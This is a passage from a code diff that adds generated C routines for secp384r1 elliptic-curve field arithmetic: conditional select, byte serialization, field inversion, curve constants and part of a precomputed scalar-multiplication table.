((arg1[2]) | ++ ((arg1[3]) | ((arg1[4]) | ((arg1[5]) | (uint64_t)0x0)))))); ++ *out1 = x1; ++} ++ ++/* ++ * The function fiat_secp384r1_selectznz is a multi-limb conditional select. ++ * Postconditions: ++ * eval out1 = (if arg1 = 0 then eval arg2 else eval arg3) ++ * ++ * Input Bounds: ++ * arg1: [0x0 ~> 0x1] ++ * arg2: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * arg3: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_selectznz(uint64_t out1[6], ++ fiat_secp384r1_uint1 arg1, ++ const uint64_t arg2[6], ++ const uint64_t arg3[6]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ fiat_secp384r1_cmovznz_u64(&x1, arg1, (arg2[0]), (arg3[0])); ++ fiat_secp384r1_cmovznz_u64(&x2, arg1, (arg2[1]), (arg3[1])); ++ fiat_secp384r1_cmovznz_u64(&x3, arg1, (arg2[2]), (arg3[2])); ++ fiat_secp384r1_cmovznz_u64(&x4, arg1, (arg2[3]), (arg3[3])); ++ fiat_secp384r1_cmovznz_u64(&x5, arg1, (arg2[4]), (arg3[4])); ++ fiat_secp384r1_cmovznz_u64(&x6, arg1, (arg2[5]), (arg3[5])); ++ out1[0] = x1; ++ out1[1] = x2; ++ out1[2] = x3; ++ out1[3] = x4; ++ out1[4] = x5; ++ out1[5] = x6; ++} ++ ++/* ++ * The function fiat_secp384r1_to_bytes serializes a field element in the Montgomery domain to bytes in little-endian order. ++ * Preconditions: ++ * 0 ≤ eval arg1 < m ++ * Postconditions: ++ * out1 = map (λ x, ⌊((eval arg1 mod m) mod 2^(8 * (x + 1))) / 2^(8 * x)⌋) [0..47] ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff]] ++ */ ++static void ++fiat_secp384r1_to_bytes(uint8_t out1[48], const uint64_t arg1[6]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ uint64_t x7; ++ uint8_t x8; ++ uint64_t x9; ++ uint8_t x10; ++ uint64_t x11; ++ uint8_t x12; ++ uint64_t x13; ++ uint8_t x14; ++ uint64_t x15; ++ uint8_t x16; ++ uint64_t x17; ++ uint8_t x18; ++ uint8_t x19; ++ uint8_t x20; ++ uint8_t x21; ++ uint64_t x22; ++ uint8_t x23; ++ uint64_t x24; ++ uint8_t x25; ++ uint64_t x26; ++ uint8_t x27; ++ uint64_t x28; ++ uint8_t x29; ++ uint64_t x30; ++ uint8_t x31; ++ uint64_t x32; ++ uint8_t x33; ++ uint8_t x34; ++ uint8_t x35; ++ uint8_t x36; ++ uint64_t x37; ++ uint8_t x38; ++ uint64_t x39; ++ uint8_t x40; ++ uint64_t x41; ++ uint8_t x42; ++ uint64_t x43; ++ uint8_t x44; ++ uint64_t x45; ++ uint8_t x46; ++ uint64_t x47; ++ uint8_t x48; ++ uint8_t x49; ++ uint8_t x50; ++ uint8_t x51; ++ uint64_t x52; ++ uint8_t x53; ++ uint64_t x54; ++ uint8_t x55; ++ uint64_t x56; ++ uint8_t x57; ++ uint64_t x58; ++ uint8_t x59; ++ uint64_t x60; ++ uint8_t x61; ++ uint64_t x62; ++ uint8_t x63; ++ uint8_t x64; ++ uint8_t x65; ++ uint8_t x66; ++ uint64_t x67; ++ uint8_t x68; ++ uint64_t x69; ++ uint8_t x70; ++ uint64_t x71; ++ uint8_t x72; ++ uint64_t x73; ++ uint8_t x74; ++ uint64_t x75; ++ uint8_t x76; ++ uint64_t x77; ++ uint8_t x78; ++ uint8_t x79; ++ uint8_t x80; ++ uint8_t x81; ++ uint64_t x82; ++ uint8_t x83; ++ uint64_t x84; ++ uint8_t x85; ++ uint64_t x86; ++ uint8_t x87; ++ uint64_t x88; ++ uint8_t x89; ++ uint64_t x90; ++ uint8_t x91; ++ uint64_t x92; ++ uint8_t x93; ++ uint8_t x94; ++ uint8_t x95; ++ x1 = (arg1[5]); ++ x2 = (arg1[4]); ++ x3 = (arg1[3]); ++ x4 = (arg1[2]); ++ x5 = (arg1[1]); ++ x6 = (arg1[0]); ++ x7 = (x6 >> 8); ++ x8 = (uint8_t)(x6 & UINT8_C(0xff)); ++ x9 = (x7 >> 8); ++ x10 = (uint8_t)(x7 & UINT8_C(0xff)); ++ x11 = (x9 >> 8); ++ x12 = (uint8_t)(x9 & UINT8_C(0xff)); ++ x13 = (x11 >> 8); ++ x14 = (uint8_t)(x11 & UINT8_C(0xff)); ++ x15 = (x13 >> 8); ++ x16 = (uint8_t)(x13 & UINT8_C(0xff)); ++ x17 = (x15 >> 8); ++ x18 = (uint8_t)(x15 & UINT8_C(0xff)); ++ x19 = (uint8_t)(x17 >> 8); ++ x20 = (uint8_t)(x17 & UINT8_C(0xff)); ++ x21 = (uint8_t)(x19 & UINT8_C(0xff)); ++ x22 = (x5 >> 8); ++ x23 = (uint8_t)(x5 & UINT8_C(0xff)); ++ x24 = (x22 >> 8); ++ x25 = (uint8_t)(x22 & UINT8_C(0xff)); ++ x26 = (x24 >> 8); ++ x27 = (uint8_t)(x24 & UINT8_C(0xff)); ++ x28 = (x26 >> 8); ++ x29 = (uint8_t)(x26 & UINT8_C(0xff)); ++ x30 = (x28 >> 8); ++ x31 = (uint8_t)(x28 & UINT8_C(0xff)); ++ x32 = (x30 >> 8); ++ x33 = (uint8_t)(x30 & UINT8_C(0xff)); ++ x34 = (uint8_t)(x32 >> 8); ++ x35 = (uint8_t)(x32 & UINT8_C(0xff)); ++ x36 = (uint8_t)(x34 & UINT8_C(0xff)); ++ x37 = (x4 >> 8); ++ x38 = (uint8_t)(x4 & UINT8_C(0xff)); ++ x39 = (x37 >> 8); ++ x40 = (uint8_t)(x37 & UINT8_C(0xff)); ++ x41 = (x39 >> 8); ++ x42 = (uint8_t)(x39 & UINT8_C(0xff)); ++ x43 = (x41 >> 8); ++ x44 = (uint8_t)(x41 & UINT8_C(0xff)); ++ x45 = (x43 >> 8); ++ x46 = (uint8_t)(x43 & UINT8_C(0xff)); ++ x47 = (x45 >> 8); ++ x48 = (uint8_t)(x45 & UINT8_C(0xff)); ++ x49 = (uint8_t)(x47 >> 8); ++ x50 = (uint8_t)(x47 & UINT8_C(0xff)); ++ x51 = (uint8_t)(x49 & UINT8_C(0xff)); ++ x52 = (x3 >> 8); ++ x53 = (uint8_t)(x3 & UINT8_C(0xff)); ++ x54 = (x52 >> 8); ++ x55 = (uint8_t)(x52 & UINT8_C(0xff)); ++ x56 = (x54 >> 8); ++ x57 = (uint8_t)(x54 & UINT8_C(0xff)); ++ x58 = (x56 >> 8); ++ x59 = (uint8_t)(x56 & UINT8_C(0xff)); ++ x60 = (x58 >> 8); ++ x61 = (uint8_t)(x58 & UINT8_C(0xff)); ++ x62 = (x60 >> 8); ++ x63 = (uint8_t)(x60 & UINT8_C(0xff)); ++ x64 = (uint8_t)(x62 >> 8); ++ x65 = (uint8_t)(x62 & UINT8_C(0xff)); ++ x66 = (uint8_t)(x64 & UINT8_C(0xff)); ++ x67 = (x2 >> 8); ++ x68 = (uint8_t)(x2 & UINT8_C(0xff)); ++ x69 = (x67 >> 8); ++ x70 = (uint8_t)(x67 & UINT8_C(0xff)); ++ x71 = (x69 >> 8); ++ x72 = (uint8_t)(x69 & UINT8_C(0xff)); ++ x73 = (x71 >> 8); ++ x74 = (uint8_t)(x71 & UINT8_C(0xff)); ++ x75 = (x73 >> 8); ++ x76 = (uint8_t)(x73 & UINT8_C(0xff)); ++ x77 = (x75 >> 8); ++ x78 = (uint8_t)(x75 & UINT8_C(0xff)); ++ x79 = (uint8_t)(x77 >> 8); ++ x80 = (uint8_t)(x77 & UINT8_C(0xff)); ++ x81 = (uint8_t)(x79 & UINT8_C(0xff)); ++ x82 = (x1 >> 8); ++ x83 = (uint8_t)(x1 & UINT8_C(0xff)); ++ x84 = (x82 >> 8); ++ x85 = (uint8_t)(x82 & UINT8_C(0xff)); ++ x86 = (x84 >> 8); ++ x87 = (uint8_t)(x84 & UINT8_C(0xff)); ++ x88 = (x86 >> 8); ++ x89 = (uint8_t)(x86 & UINT8_C(0xff)); ++ x90 = (x88 >> 8); ++ x91 = (uint8_t)(x88 & UINT8_C(0xff)); ++ x92 = (x90 >> 8); ++ x93 = (uint8_t)(x90 & UINT8_C(0xff)); ++ x94 = (uint8_t)(x92 >> 8); ++ x95 = (uint8_t)(x92 & UINT8_C(0xff)); ++ out1[0] = x8; ++ out1[1] = x10; ++ out1[2] = x12; ++ out1[3] = x14; ++ out1[4] = x16; ++ out1[5] = x18; ++ out1[6] = x20; ++ out1[7] = x21; ++ out1[8] = x23; ++ out1[9] = x25; ++ out1[10] = x27; ++ out1[11] = x29; ++ out1[12] = x31; ++ out1[13] = x33; ++ out1[14] = x35; ++ out1[15] = x36; ++ out1[16] = x38; ++ out1[17] = x40; ++ out1[18] = x42; ++ out1[19] = x44; ++ out1[20] = x46; ++ out1[21] = x48; ++ out1[22] = x50; ++ out1[23] = x51; ++ out1[24] = x53; ++ out1[25] = x55; ++ out1[26] = x57; ++ out1[27] = x59; ++ out1[28] = x61; ++ out1[29] = x63; ++ out1[30] = x65; ++ out1[31] = x66; ++ out1[32] = x68; ++ out1[33] = x70; ++ out1[34] = x72; ++ out1[35] = x74; ++ out1[36] = x76; ++ out1[37] = x78; ++ out1[38] = x80; ++ out1[39] = x81; ++ out1[40] = x83; ++ out1[41] = x85; ++ out1[42] = x87; ++ out1[43] = x89; ++ out1[44] = x91; ++ out1[45] = x93; ++ out1[46] = x95; ++ out1[47] = x94; ++} ++ ++/* ++ * The function fiat_secp384r1_from_bytes deserializes a field element in the Montgomery domain from bytes in little-endian order. ++ * Preconditions: ++ * 0 ≤ bytes_eval arg1 < m ++ * Postconditions: ++ * eval out1 mod m = bytes_eval arg1 mod m ++ * 0 ≤ eval out1 < m ++ * ++ * Input Bounds: ++ * arg1: [[0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff], [0x0 ~> 0xff]] ++ * Output Bounds: ++ * out1: [[0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff], [0x0 ~> 0xffffffffffffffff]] ++ */ ++static void ++fiat_secp384r1_from_bytes(uint64_t out1[6], ++ const uint8_t arg1[48]) ++{ ++ uint64_t x1; ++ uint64_t x2; ++ uint64_t x3; ++ uint64_t x4; ++ uint64_t x5; ++ uint64_t x6; ++ uint64_t x7; ++ uint8_t x8; ++ uint64_t x9; ++ uint64_t x10; ++ uint64_t x11; ++ uint64_t x12; ++ uint64_t x13; ++ uint64_t x14; ++ uint64_t x15; ++ uint8_t x16; ++ uint64_t x17; ++ uint64_t x18; ++ uint64_t x19; ++ uint64_t x20; ++ uint64_t x21; ++ uint64_t x22; ++ uint64_t x23; ++ uint8_t x24; ++ uint64_t x25; ++ uint64_t x26; ++ uint64_t x27; ++ uint64_t x28; ++ uint64_t x29; ++ uint64_t x30; ++ uint64_t x31; ++ uint8_t x32; ++ uint64_t x33; ++ uint64_t x34; ++ uint64_t x35; ++ uint64_t x36; ++ uint64_t x37; ++ uint64_t x38; ++ uint64_t x39; ++ uint8_t x40; ++ uint64_t x41; ++ uint64_t x42; ++ uint64_t x43; ++ uint64_t x44; ++ uint64_t x45; ++ uint64_t x46; ++ uint64_t x47; ++ uint8_t x48; ++ uint64_t x49; ++ uint64_t x50; ++ uint64_t x51; ++ uint64_t x52; ++ uint64_t x53; ++ uint64_t x54; ++ uint64_t x55; ++ uint64_t x56; ++ uint64_t x57; ++ uint64_t x58; ++ uint64_t x59; ++ x1 = ((uint64_t)(arg1[47]) << 56); ++ x2 = ((uint64_t)(arg1[46]) << 48); ++ x3 = ((uint64_t)(arg1[45]) << 40); ++ x4 = ((uint64_t)(arg1[44]) << 32); ++ x5 = ((uint64_t)(arg1[43]) << 24); ++ x6 = ((uint64_t)(arg1[42]) << 16); ++ x7 = ((uint64_t)(arg1[41]) << 8); ++ x8 = (arg1[40]); ++ x9 = ((uint64_t)(arg1[39]) << 56); ++ x10 = ((uint64_t)(arg1[38]) << 48); ++ x11 = ((uint64_t)(arg1[37]) << 40); ++ x12 = ((uint64_t)(arg1[36]) << 32); ++ x13 = ((uint64_t)(arg1[35]) << 24); ++ x14 = ((uint64_t)(arg1[34]) << 16); ++ x15 = ((uint64_t)(arg1[33]) << 8); ++ x16 = (arg1[32]); ++ x17 = ((uint64_t)(arg1[31]) << 56); ++ x18 = ((uint64_t)(arg1[30]) << 48); ++ x19 = ((uint64_t)(arg1[29]) << 40); ++ x20 = ((uint64_t)(arg1[28]) << 32); ++ x21 = ((uint64_t)(arg1[27]) << 24); ++ x22 = ((uint64_t)(arg1[26]) << 16); ++ x23 = ((uint64_t)(arg1[25]) << 8); ++ x24 = (arg1[24]); ++ x25 = ((uint64_t)(arg1[23]) << 56); ++ x26 = ((uint64_t)(arg1[22]) << 48); ++ x27 = ((uint64_t)(arg1[21]) << 40); ++ x28 = ((uint64_t)(arg1[20]) << 32); ++ x29 = ((uint64_t)(arg1[19]) << 24); ++ x30 = ((uint64_t)(arg1[18]) << 16); ++ x31 = ((uint64_t)(arg1[17]) << 8); ++ x32 = (arg1[16]); ++ x33 = ((uint64_t)(arg1[15]) << 56); ++ x34 = ((uint64_t)(arg1[14]) << 48); ++ x35 = ((uint64_t)(arg1[13]) << 40); ++ x36 = ((uint64_t)(arg1[12]) << 32); ++ x37 = ((uint64_t)(arg1[11]) << 24); ++ x38 = ((uint64_t)(arg1[10]) << 16); ++ x39 = ((uint64_t)(arg1[9]) << 8); ++ x40 = (arg1[8]); ++ x41 = ((uint64_t)(arg1[7]) << 56); ++ x42 = ((uint64_t)(arg1[6]) << 48); ++ x43 = ((uint64_t)(arg1[5]) << 40); ++ x44 = ((uint64_t)(arg1[4]) << 32); ++ x45 = ((uint64_t)(arg1[3]) << 24); ++ x46 = ((uint64_t)(arg1[2]) << 16); ++ x47 = ((uint64_t)(arg1[1]) << 8); ++ x48 = (arg1[0]); ++ x49 = (x48 + (x47 + (x46 + (x45 + (x44 + (x43 + (x42 + x41))))))); ++ x50 = (x49 & UINT64_C(0xffffffffffffffff)); ++ x51 = (x8 + (x7 + (x6 + (x5 + (x4 + (x3 + (x2 + x1))))))); ++ x52 = (x16 + (x15 + (x14 + (x13 + (x12 + (x11 + (x10 + x9))))))); ++ x53 = (x24 + (x23 + (x22 + (x21 + (x20 + (x19 + (x18 + x17))))))); ++ x54 = (x32 + (x31 + (x30 + (x29 + (x28 + (x27 + (x26 + x25))))))); ++ x55 = (x40 + (x39 + (x38 + (x37 + (x36 + (x35 + (x34 + x33))))))); ++ x56 = (x55 & UINT64_C(0xffffffffffffffff)); ++ x57 = (x54 & UINT64_C(0xffffffffffffffff)); ++ x58 = (x53 & UINT64_C(0xffffffffffffffff)); ++ x59 = (x52 & UINT64_C(0xffffffffffffffff)); ++ out1[0] = x50; ++ out1[1] = x56; ++ out1[2] = x57; ++ out1[3] = x58; ++ out1[4] = x59; ++ out1[5] = x51; ++} ++ ++/* END verbatim fiat code */ ++ ++/*- ++ * Finite field inversion via FLT. ++ * NB: this is not a real Fiat function, just named that way for consistency. ++ * Autogenerated: ecp/secp384r1/fe_inv.op3 ++ * custom repunit addition chain ++ */ ++static void ++fiat_secp384r1_inv(fe_t output, const fe_t t1) ++{ ++ int i; ++ /* temporary variables */ ++ fe_t acc, t10, t170, t2, t20, t255, t30, t32, t4, t64, t8, t84, t85; ++ ++ fiat_secp384r1_square(acc, t1); ++ fiat_secp384r1_mul(t2, acc, t1); ++ fiat_secp384r1_square(acc, t2); ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t4, acc, t2); ++ fiat_secp384r1_square(acc, t4); ++ for (i = 0; i < 3; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t8, acc, t4); ++ fiat_secp384r1_square(acc, t8); ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t10, acc, t2); ++ fiat_secp384r1_square(acc, t10); ++ for (i = 0; i < 9; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t20, acc, t10); ++ fiat_secp384r1_square(acc, t20); ++ for (i = 0; i < 9; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t30, acc, t10); ++ fiat_secp384r1_square(acc, t30); ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t32, acc, t2); ++ fiat_secp384r1_square(acc, t32); ++ for (i = 0; i < 31; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t64, acc, t32); ++ fiat_secp384r1_square(acc, t64); ++ for (i = 0; i < 19; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t84, acc, t20); ++ fiat_secp384r1_square(acc, t84); ++ fiat_secp384r1_mul(t85, acc, t1); ++ fiat_secp384r1_square(acc, t85); ++ for (i = 0; i < 84; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t170, acc, t85); ++ fiat_secp384r1_square(acc, t170); ++ for (i = 0; i < 84; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(t255, acc, t85); ++ fiat_secp384r1_square(acc, t255); ++ for (i = 0; i < 32; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(acc, acc, t32); ++ for (i = 0; i < 94; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(acc, acc, t30); ++ for (i = 0; i < 2; i++) ++ fiat_secp384r1_square(acc, acc); ++ fiat_secp384r1_mul(output, acc, t1); ++} ++ ++/* curve coefficient constants */ ++ ++static const limb_t const_one[6] = { ++ UINT64_C(0xFFFFFFFF00000001), UINT64_C(0x00000000FFFFFFFF), ++ UINT64_C(0x0000000000000001), UINT64_C(0x0000000000000000), ++ UINT64_C(0x0000000000000000), UINT64_C(0x0000000000000000) ++}; ++ ++static const limb_t const_b[6] = { ++ UINT64_C(0x081188719D412DCC), UINT64_C(0xF729ADD87A4C32EC), ++ UINT64_C(0x77F2209B1920022E), UINT64_C(0xE3374BEE94938AE2), ++ UINT64_C(0xB62B21F41F022094), UINT64_C(0xCD08114B604FBFF9) ++}; ++ ++/* LUT for scalar multiplication by comb interleaving */ ++static const pt_aff_t lut_cmb[21][16] = { ++ { ++ { { UINT64_C(0x3DD0756649C0B528), UINT64_C(0x20E378E2A0D6CE38), ++ UINT64_C(0x879C3AFC541B4D6E), UINT64_C(0x6454868459A30EFF), ++ UINT64_C(0x812FF723614EDE2B), UINT64_C(0x4D3AADC2299E1513) }, ++ { UINT64_C(0x23043DAD4B03A4FE), UINT64_C(0xA1BFA8BF7BB4A9AC), ++ UINT64_C(0x8BADE7562E83B050), UINT64_C(0xC6C3521968F4FFD9), ++ UINT64_C(0xDD8002263969A840), UINT64_C(0x2B78ABC25A15C5E9) } }, ++ { { UINT64_C(0x05E4DBE6C1DC4073), UINT64_C(0xC54EA9FFF04F779C), ++ UINT64_C(0x6B2034E9A170CCF0), UINT64_C(0x3A48D732D51C6C3E), ++ UINT64_C(0xE36F7E2D263AA470), UINT64_C(0xD283FE68E7C1C3AC) }, ++ { UINT64_C(0x7E284821C04EE157), UINT64_C(0x92D789A77AE0E36D), ++ UINT64_C(0x132663C04EF67446), UINT64_C(0x68012D5AD2E1D0B4), ++ UINT64_C(0xF6DB68B15102B339), UINT64_C(0x465465FC983292AF) } }, ++ { { UINT64_C(0xBB595EBA68F1F0DF), UINT64_C(0xC185C0CBCC873466), ++ UINT64_C(0x7F1EB1B5293C703B), UINT64_C(0x60DB2CF5AACC05E6), ++ UINT64_C(0xC676B987E2E8E4C6), UINT64_C(0xE1BB26B11D178FFB) }, ++ { UINT64_C(0x2B694BA07073FA21), UINT64_C(0x22C16E2E72F34566), ++ UINT64_C(0x80B61B3101C35B99), UINT64_C(0x4B237FAF982C0411), ++ UINT64_C(0xE6C5944024DE236D), UINT64_C(0x4DB1C9D6E209E4A3) } }, ++ { { UINT64_C(0xDF13B9D17D69222B), UINT64_C(0x4CE6415F874774B1), ++ UINT64_C(0x731EDCF8211FAA95), UINT64_C(0x5F4215D1659753ED), ++ UINT64_C(0xF893DB589DB2DF55), UINT64_C(0x932C9F811C89025B) }, ++ { UINT64_C(0x0996B2207706A61E), UINT64_C(0x135349D5A8641C79), ++ UINT64_C(0x65AAD76F50130844), UINT64_C(0x0FF37C0401FFF780), ++ UINT64_C(0xF57F238E693B0706), UINT64_C(0xD90A16B6AF6C9B3E) } }, ++ { { UINT64_C(0x2F5D200E2353B92F), UINT64_C(0xE35D87293FD7E4F9), ++ UINT64_C(0x26094833A96D745D), UINT64_C(0xDC351DC13CBFFF3F), ++ UINT64_C(0x26D464C6DAD54D6A), UINT64_C(0x5CAB1D1D53636C6A) }, ++ { UINT64_C(0xF2813072B18EC0B0), UINT64_C(0x3777E270D742AA2F), ++ UINT64_C(0x27F061C7033CA7C2), UINT64_C(0xA6ECACCC68EAD0D8), ++ UINT64_C(0x7D9429F4EE69A754), UINT64_C(0xE770633431E8F5C6) } }, ++ { { UINT64_C(0xC7708B19B68B8C7D), UINT64_C(0x4532077C44377ABA), ++ UINT64_C(0x0DCC67706CDAD64F), UINT64_C(0x01B8BF56147B6602), ++ UINT64_C(0xF8D89885F0561D79), UINT64_C(0x9C19E9FC7BA9C437) }, ++ { UINT64_C(0x764EB146BDC4BA25), UINT64_C(0x604FE46BAC144B83), ++ UINT64_C(0x3CE813298A77E780), UINT64_C(0x2E070F36FE9E682E), ++ UINT64_C(0x41821D0C3A53287A), UINT64_C(0x9AA62F9F3533F918) } }, ++ { { UINT64_C(0x9B7AEB7E75CCBDFB), UINT64_C(0xB25E28C5F6749A95), ++ UINT64_C(0x8A7A8E4633B7D4AE), UINT64_C(0xDB5203A8D9C1BD56), ++ UINT64_C(0xD2657265ED22DF97), UINT64_C(0xB51C56E18CF23C94) }, ++ { UINT64_C(0xF4D394596C3D812D), UINT64_C(0xD8E88F1A87CAE0C2), ++ UINT64_C(0x789A2A48CF4D0FE3), UINT64_C(0xB7FEAC2DFEC38D60), ++ UINT64_C(0x81FDBD1C3B490EC3), UINT64_C(0x4617ADB7CC6979E1) } }, ++ { { UINT64_C(0x446AD8884709F4A9), UINT64_C(0x2B7210E2EC3DABD8), ++ UINT64_C(0x83CCF19550E07B34), UINT64_C(0x59500917789B3075), ++ UINT64_C(0x0FC01FD4EB085993), UINT64_C(0xFB62D26F4903026B) }, ++ { UINT64_C(0x2309CC9D6FE989BB), UINT64_C(0x61609CBD144BD586), ++ UINT64_C(0x4B23D3A0DE06610C), UINT64_C(0xDDDC2866D898F470), ++ UINT64_C(0x8733FC41400C5797), UINT64_C(0x5A68C6FED0BC2716) } }, ++ { { UINT64_C(0x8903E1304B4A3CD0), UINT64_C(0x3EA4EA4C8FF1F43E), ++ UINT64_C(0xE6FC3F2AF655A10D), UINT64_C(0x7BE3737D524FFEFC), ++ UINT64_C(0x9F6928555330455E), UINT64_C(0x524F166EE475CE70) }, ++ { UINT64_C(0x3FCC69CD6C12F055), UINT64_C(0x4E23B6FFD5B9C0DA), ++ UINT64_C(0x49CE6993336BF183), UINT64_C(0xF87D6D854A54504A), ++ UINT64_C(0x25EB5DF1B3C2677A), UINT64_C(0xAC37986F55B164C9) } }, ++ { { UINT64_C(0x82A2ED4ABAA84C08), UINT64_C(0x22C4CC5F41A8C912), ++ UINT64_C(0xCA109C3B154AAD5E), UINT64_C(0x23891298FC38538E), ++ UINT64_C(0xB3B6639C539802AE), UINT64_C(0xFA0F1F450390D706) }, ++ { UINT64_C(0x46B78E5DB0DC21D0), UINT64_C(0xA8C72D3CC3DA2EAC), ++ UINT64_C(0x9170B3786FF2F643), UINT64_C(0x3F5A799BB67F30C3), ++ UINT64_C(0x15D1DC778264B672), UINT64_C(0xA1D47B23E9577764) } }, ++ { { UINT64_C(0x08265E510422CE2F), UINT64_C(0x88E0D496DD2F9E21), ++ UINT64_C(0x30128AA06177F75D), UINT64_C(0x2E59AB62BD9EBE69), ++ UINT64_C(0x1B1A0F6C5DF0E537), UINT64_C(0xAB16C626DAC012B5) }, ++ { UINT64_C(0x8014214B008C5DE7), UINT64_C(0xAA740A9E38F17BEA), ++ UINT64_C(0x262EBB498A149098), UINT64_C(0xB454111E8527CD59), ++ UINT64_C(0x266AD15AACEA5817), UINT64_C(0x21824F411353CCBA) } }, ++ { { UINT64_C(0xD1B4E74D12E3683B), UINT64_C(0x990ED20B569B8EF6), ++ UINT64_C(0xB9D3DD25429C0A18), UINT64_C(0x1C75B8AB2A351783), ++ UINT64_C(0x61E4CA2B905432F0), UINT64_C(0x80826A69EEA8F224) }, ++ { UINT64_C(0x7FC33A6BEC52ABAD), UINT64_C(0x0BCCA3F0A65E4813), ++ UINT64_C(0x7AD8A132A527CEBE), UINT64_C(0xF0138950EAF22C7E), ++ UINT64_C(0x282D2437566718C1), UINT64_C(0x9DFCCB0DE2212559) } }, ++ { { UINT64_C(0x1E93722758CE3B83), UINT64_C(0xBB280DFA3CB3FB36), ++ UINT64_C(0x57D0F3D2E2BE174A), UINT64_C(0x9BD51B99208ABE1E), ++ UINT64_C(0x3809AB50DE248024), UINT64_C(0xC29C6E2CA5BB7331) }, ++ { UINT64_C(0x9944FD2E61124F05), UINT64_C(0x83CCBC4E9009E391), ++ UINT64_C(0x01628F059424A3CC), UINT64_C(0xD6A2F51DEA8E4344), ++ UINT64_C(0xDA3E1A3D4CEBC96E), UINT64_C(0x1FE6FB42E97809DC) } }, ++ { { UINT64_C(0xA04482D2467D66E4), UINT64_C(0xCF1912934D78291D), ++ UINT64_C(0x8E0D4168482396F9), UINT64_C(0x7228E2D5D18F14D0), ++ UINT64_C(0x2F7E8D509C6A58FE), UINT64_C(0xE8CA780E373E5AEC) }, ++ { UINT64_C(0x42AAD1D61B68E9F8), UINT64_C(0x58A6D7F569E2F8F4), ++ UINT64_C(0xD779ADFE31DA1BEA), UINT64_C(0x7D26540638C85A85), ++ UINT64_C(0x67E67195D44D3CDF), UINT64_C(0x17820A0BC5134ED7) } }, ++ { { UINT64_C(0x019D6AC5D3021470), 